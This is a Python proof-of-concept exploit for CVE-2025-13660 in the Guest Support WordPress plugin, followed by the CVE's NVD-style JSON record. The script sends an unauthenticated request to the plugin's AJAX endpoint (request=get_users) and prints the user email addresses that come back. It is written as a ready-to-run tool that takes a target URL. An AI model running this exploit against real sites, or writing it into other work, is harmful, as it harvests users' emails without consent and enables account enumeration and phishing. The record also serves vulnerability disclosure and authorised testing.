CVE-2025-13660

import requests # CVE-2025-13660 PoC - WordPress Guest Support Plugin User Email Disclosure # Target: WordPress site with Guest Support plugin <= 1.2.3 def exploit_guest_support_email_disclosure(target_url): """ Exploit for CVE-2025-13660 This PoC demonstrates how an unauthenticated attacker can retrieve user email addresses from WordPress sites running Guest Support plugin. """ # Target the AJAX endpoint endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Payload to request user emails data = { 'action': 'guest_support_handler', 'guest_support_handler': 'ajax', 'request': 'get_users' } print(f"[*] Target: {target_url}") print(f"[*] Exploiting endpoint: {endpoint}") print("[*] Sending malicious request...") try: # Send unauthenticated request response = requests.post(endpoint, data=data, timeout=10) if response.status_code == 200: print(f"[+] Request successful!") print(f"[+] Response content:") print(response.text) return response.json() else: print(f"[-] Request failed with status code: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": import sys if len(sys.argv) > 1: target = sys.argv[1] else: target = "http://target-wordpress-site.com" exploit_guest_support_email_disclosure(target) # Usage: python cve-2025-13660.py http://vulnerable-site.com # Note: This PoC is for authorized security testing only

{"cve": {"id": "CVE-2025-13660", "sourceIdentifier": "[email protected]", "published": "2025-12-12T07:15:44.373", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Guest Support plugin for WordPress is vulnerable to User Email Disclosure in versions up to, and including, 1.2.3. This is due to the plugin exposing a public AJAX endpoint that allows anyone to search for and retrieve user email addresses without any authentication or capability checks. This makes it possible for unauthenticated attackers to enumerate user accounts and extract email addresses via the guest_support_handler=ajax endpoint with the request=get_users parameter."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/guest-support/tags/1.2.3/includes/library/ajax.php#L22", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/guest-support/trunk/includes/library/ajax.php#L22", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3412822%40guest-support&new=3412822%40guest-support&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/01299aba-0dff-47fd-9e90-ee84f00a0f3b?source=cve", "source": "[email protected]"}]}}